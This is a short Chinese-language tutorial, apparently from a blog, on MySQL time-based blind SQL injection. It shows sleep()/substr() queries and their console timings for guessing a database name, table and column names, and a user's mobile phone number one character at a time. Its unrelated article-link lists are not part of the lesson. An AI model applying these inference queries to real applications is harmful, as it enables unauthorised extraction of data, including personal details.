无需页面报错,根据页面响应时间做判断!

mysql基于时间的盲注

======================================================================================================================================================================

*	猜解库名

	-	下面是猜解正确

	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);

		+----------+

		| sleep(1) |

		+----------+

		|        0 |

		+----------+

		1 row in set (1.00 sec)

	-	下面是猜解错误

	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);

		Empty set (0.00 sec)

*	猜解表名

	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a  where substr(a_tn, 1, 1)='f';

			+----------+

			| sleep(1) |

			+----------+

			|        0 |

			+----------+

			1 row in set (1.00 sec)

	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a  where substr(a_tn, 1, 1)='x';

			Empty set (0.00 sec)

*	猜解字段名

	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a  where substr(a_cn, 1, 1)='i';

			+----------+

			| sleep(1) |

			+----------+

			|        0 |

			+----------+

			1 row in set (1.01 sec)

	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a  where substr(a_cn, 2, 1)='d';

			+----------+

			| sleep(1) |

			+----------+

			|        0 |

			+----------+

			1 row in set (1.00 sec)

*	猜解字段值

	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)='1';

			+----------+

			| sleep(1) |

			+----------+

			|        0 |

			+----------+

			1 row in set (1.00 sec)

	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='3';

	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='8';

			+----------+

			| sleep(1) |

			+----------+

			|        0 |

			+----------+

			1 row in set (1.00 sec)

  

最新文章

  1. Cocoapods - pod install 成功后找不到头文件解决
  2. DWORD类型的IP地址转换为CString字符串
  3. [原创]Java中的字符串比较,按照使用习惯进行比较
  4. tmux protocol version mismatch (client 7, server 6)
  5. Oracle查询字符集
  6. UVA 437 十九 The Tower of Babylon
  7. win7登入使用的是临时档案解决方法
  8. iOS中常用的正则表达式
  9. 使用EF实现数据库的增删改查
  10. nginx 伪静态大于10个参数 $10
  11. PreTranslateMessage和TranslateMessage区别(转)
  12. C#操作注册表--DarrenF
  13. 使用winform控件注意线程绘制界面冲突
  14. Django 设置cookies与获取cookies.
  15. 工作中常用的linux命令(2)
  16. Android为TV端助力 集成第三方播放器,实现全屏播放
  17. 鱼刺 winhttp
  18. shell传递参数
  19. vue.js+SSH添加和查询
  20. ActiveMQ consumer按顺序处理消息

热门文章

  1. dubox首次调用消费者执行两次问题
  2. [js] 变量空值研究
  3. Fragment之间传值
  4. 刷新页面时 select值保持不变
  5. [bzoj3932][CQOI2015][任务查询系统] (主席树)
  6. 腾讯GT的流畅度测试方案研究
  7. 如何有效地解决ie7,IE8不支持document.getElmentsByClassName的问题
  8. [原创]vscode初体验
  9. C#-WebForm-Repeater-重复器
  10. [CodeIgniter] 在自定义类库中使用config配置项